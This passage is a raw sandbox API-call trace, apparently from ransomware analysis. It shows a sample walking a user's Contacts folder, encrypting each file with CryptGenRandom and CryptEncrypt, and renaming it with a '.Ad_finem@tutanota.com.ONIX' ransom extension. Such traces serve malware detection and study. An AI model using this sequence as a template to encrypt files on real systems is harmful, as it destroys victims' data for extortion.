lpBuffer=0x4d8b68, nNumberOfBytesToRead=0x49a, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8b68*, lpNumberOfBytesRead=0x367f44c*=0x49a, lpOverlapped=0x0) returned 1 [0119.942] SetFilePointer (in: hFile=0x4a0, lDistanceToMove=-1178, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.942] WriteFile (in: hFile=0x4a0, lpBuffer=0x4d9010*, nNumberOfBytesToWrite=0x49a, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d9010*, lpNumberOfBytesWritten=0x367f44c*=0x49a, lpOverlapped=0x0) returned 1 [0119.943] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8b68 | out: hHeap=0x410000) returned 1 [0119.943] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d9010 | out: hHeap=0x410000) returned 1 [0119.944] UnlockFile (hFile=0x4a0, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x49a, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0119.944] CloseHandle (hObject=0x4a0) returned 1 [0119.944] GetProcessHeap () returned 0x410000 [0119.944] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0119.944] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\aclviho asldjfl.contact"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\aclviho asldjfl.contact.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0119.950] GetProcessHeap () returned 0x410000 [0119.950] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x449878 | out: hHeap=0x410000) returned 1 [0119.950] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0119.951] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0119.951] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458a78 | out: hHeap=0x410000) returned 1 [0119.951] FindNextFileW (in: hFindFile=0x48ed70, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf0fefd94, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x10b1e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Administrator.contact", cAlternateFileName="ADMINI~1.CON")) returned 1 [0119.951] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458b00 | out: hHeap=0x410000) returned 1 [0119.951] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0119.951] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458b00 [0119.951] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0119.951] GetLastError () returned 0x0 [0119.951] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.contact"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4a0 [0119.951] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0119.951] LockFile (hFile=0x4a0, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x10b1e, nNumberOfBytesToLockHigh=0x0) returned 1 [0119.951] SetFilePointerEx (in: hFile=0x4a0, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0119.951] ReadFile (in: hFile=0x4a0, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0119.953] SetFilePointerEx (in: hFile=0x4a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0119.953] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0119.953] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0119.953] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0119.953] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact", dwFileAttributes=0x80) returned 1 [0119.953] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact") returned 61 [0119.953] GetProcessHeap () returned 0x410000 [0119.953] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xea) returned 0x449878 [0119.954] lstrcpyW (in: lpString1=0x449878, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact" [0119.954] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0119.954] GetFileSizeEx (in: hFile=0x4a0, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=68382) returned 1 [0119.954] SetFilePointer (in: hFile=0x4a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x10b1e [0119.954] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0119.954] GetProcessHeap () returned 0x410000 [0119.954] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x467908 [0119.954] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x467908*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x467908*, pdwDataLen=0x367f414*=0x100) returned 1 [0119.954] WriteFile (in: hFile=0x4a0, lpBuffer=0x467908*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x467908*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0119.956] WriteFile (in: hFile=0x4a0, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0119.957] WriteFile (in: hFile=0x4a0, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0119.957] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10b1e) returned 0x4d8b68 [0119.958] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10b1e) returned 0xf50048 [0119.959] SetFilePointer (in: hFile=0x4a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.959] ReadFile (in: hFile=0x4a0, lpBuffer=0x4d8b68, nNumberOfBytesToRead=0x10b1e, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8b68*, lpNumberOfBytesRead=0x367f44c*=0x10b1e, lpOverlapped=0x0) returned 1 [0119.961] SetFilePointer (in: hFile=0x4a0, lDistanceToMove=-68382, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.961] WriteFile (in: hFile=0x4a0, lpBuffer=0xf50048*, nNumberOfBytesToWrite=0x10b1e, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0xf50048*, lpNumberOfBytesWritten=0x367f44c*=0x10b1e, lpOverlapped=0x0) returned 1 [0119.964] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8b68 | out: hHeap=0x410000) returned 1 [0119.964] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0xf50048 | out: hHeap=0x410000) returned 1 [0119.964] UnlockFile (hFile=0x4a0, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x10b1e, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0119.964] CloseHandle (hObject=0x4a0) returned 1 [0119.965] GetProcessHeap () returned 0x410000 [0119.965] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0119.965] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.contact"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.contact.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0119.967] GetProcessHeap () returned 0x410000 [0119.967] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x449878 | out: hHeap=0x410000) returned 1 [0119.967] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0119.967] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0119.967] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458a78 | out: hHeap=0x410000) returned 1 [0119.967] FindNextFileW (in: hFindFile=0x48ed70, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaa5080, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaa5080, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaa5080, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x493, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="asdlfk poopvy.contact", cAlternateFileName="ASDLFK~1.CON")) returned 1 [0119.967] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458b00 | out: hHeap=0x410000) returned 1 [0119.967] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0119.967] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458b00 [0119.968] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0119.968] GetLastError () returned 0x0 [0119.968] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\asdlfk poopvy.contact"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4a0 [0119.968] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0119.968] LockFile (hFile=0x4a0, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x493, nNumberOfBytesToLockHigh=0x0) returned 1 [0119.968] SetFilePointerEx (in: hFile=0x4a0, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0119.968] ReadFile (in: hFile=0x4a0, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0119.970] SetFilePointerEx (in: hFile=0x4a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0119.970] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0119.970] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0119.970] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0119.970] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact", dwFileAttributes=0x80) returned 1 [0119.970] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact") returned 61 [0119.970] GetProcessHeap () returned 0x410000 [0119.970] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xea) returned 0x449878 [0119.970] lstrcpyW (in: lpString1=0x449878, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact" [0119.970] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0119.970] GetFileSizeEx (in: hFile=0x4a0, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=1171) returned 1 [0119.971] SetFilePointer (in: hFile=0x4a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x493 [0119.971] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0119.971] GetProcessHeap () returned 0x410000 [0119.971] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x467908 [0119.971] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x467908*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x467908*, pdwDataLen=0x367f414*=0x100) returned 1 [0119.973] WriteFile (in: hFile=0x4a0, lpBuffer=0x467908*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x467908*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0119.974] WriteFile (in: hFile=0x4a0, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0119.975] WriteFile (in: hFile=0x4a0, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0119.976] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x493) returned 0x4d8b68 [0119.976] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x493) returned 0x4d9008 [0119.976] SetFilePointer (in: hFile=0x4a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.976] ReadFile (in: hFile=0x4a0, lpBuffer=0x4d8b68, nNumberOfBytesToRead=0x493, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8b68*, lpNumberOfBytesRead=0x367f44c*=0x493, lpOverlapped=0x0) returned 1 [0119.976] SetFilePointer (in: hFile=0x4a0, lDistanceToMove=-1171, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.976] WriteFile (in: hFile=0x4a0, lpBuffer=0x4d9008*, nNumberOfBytesToWrite=0x493, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d9008*, lpNumberOfBytesWritten=0x367f44c*=0x493, lpOverlapped=0x0) returned 1 [0119.978] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8b68 | out: hHeap=0x410000) returned 1 [0119.978] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d9008 | out: hHeap=0x410000) returned 1 [0119.978] UnlockFile (hFile=0x4a0, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x493, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0119.978] CloseHandle (hObject=0x4a0) returned 1 [0119.979] GetProcessHeap () returned 0x410000 [0119.979] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0119.979] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\asdlfk poopvy.contact"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\asdlfk poopvy.contact.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0119.981] GetProcessHeap () returned 0x410000 [0119.981] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x449878 | out: hHeap=0x410000) returned 1 [0119.981] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0119.981] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0119.981] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458a78 | out: hHeap=0x410000) returned 1 [0119.981] FindNextFileW (in: hFindFile=0x48ed70, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eacb1e0, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eacb1e0, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eacb1e0, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x499, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="chucu jadnvk.contact", cAlternateFileName="CHUCUJ~1.CON")) returned 1 [0119.981] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458b00 | out: hHeap=0x410000) returned 1 [0119.981] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0119.981] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458b00 [0119.981] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0119.981] GetLastError () returned 0x0 [0119.982] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\chucu jadnvk.contact"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4a0 [0119.982] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0119.982] LockFile (hFile=0x4a0, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x499, nNumberOfBytesToLockHigh=0x0) returned 1 [0119.982] SetFilePointerEx (in: hFile=0x4a0, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0119.982] ReadFile (in: hFile=0x4a0, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0119.984] SetFilePointerEx (in: hFile=0x4a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0119.984] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0119.984] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0119.984] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0119.984] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact", dwFileAttributes=0x80) returned 1 [0119.984] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact") returned 60 [0119.984] GetProcessHeap () returned 0x410000 [0119.984] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xe8) returned 0x460008 [0119.984] lstrcpyW (in: lpString1=0x460008, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact" [0119.984] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0119.985] GetFileSizeEx (in: hFile=0x4a0, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=1177) returned 1 [0119.985] SetFilePointer (in: hFile=0x4a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x499 [0119.985] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0119.985] GetProcessHeap () returned 0x410000 [0119.985] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x467908 [0119.985] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x467908*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x467908*, pdwDataLen=0x367f414*=0x100) returned 1 [0119.985] WriteFile (in: hFile=0x4a0, lpBuffer=0x467908*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x467908*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0119.987] WriteFile (in: hFile=0x4a0, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0119.988] WriteFile (in: hFile=0x4a0, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0119.988] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x499) returned 0x4d8b68 [0119.989] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x499) returned 0x4d9010 [0119.989] SetFilePointer (in: hFile=0x4a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.989] ReadFile (in: hFile=0x4a0, lpBuffer=0x4d8b68, nNumberOfBytesToRead=0x499, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8b68*, lpNumberOfBytesRead=0x367f44c*=0x499, lpOverlapped=0x0) returned 1 [0119.989] SetFilePointer (in: hFile=0x4a0, lDistanceToMove=-1177, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.989] WriteFile (in: hFile=0x4a0, lpBuffer=0x4d9010*, nNumberOfBytesToWrite=0x499, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d9010*, lpNumberOfBytesWritten=0x367f44c*=0x499, lpOverlapped=0x0) returned 1 [0119.990] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8b68 | out: hHeap=0x410000) returned 1 [0119.990] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d9010 | out: hHeap=0x410000) returned 1 [0119.990] UnlockFile (hFile=0x4a0, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x499, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0119.990] CloseHandle (hObject=0x4a0) returned 1 [0119.991] GetProcessHeap () returned 0x410000 [0119.991] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0119.991] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\chucu jadnvk.contact"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\chucu jadnvk.contact.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0119.994] GetProcessHeap () returned 0x410000 [0119.994] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x460008 | out: hHeap=0x410000) returned 1 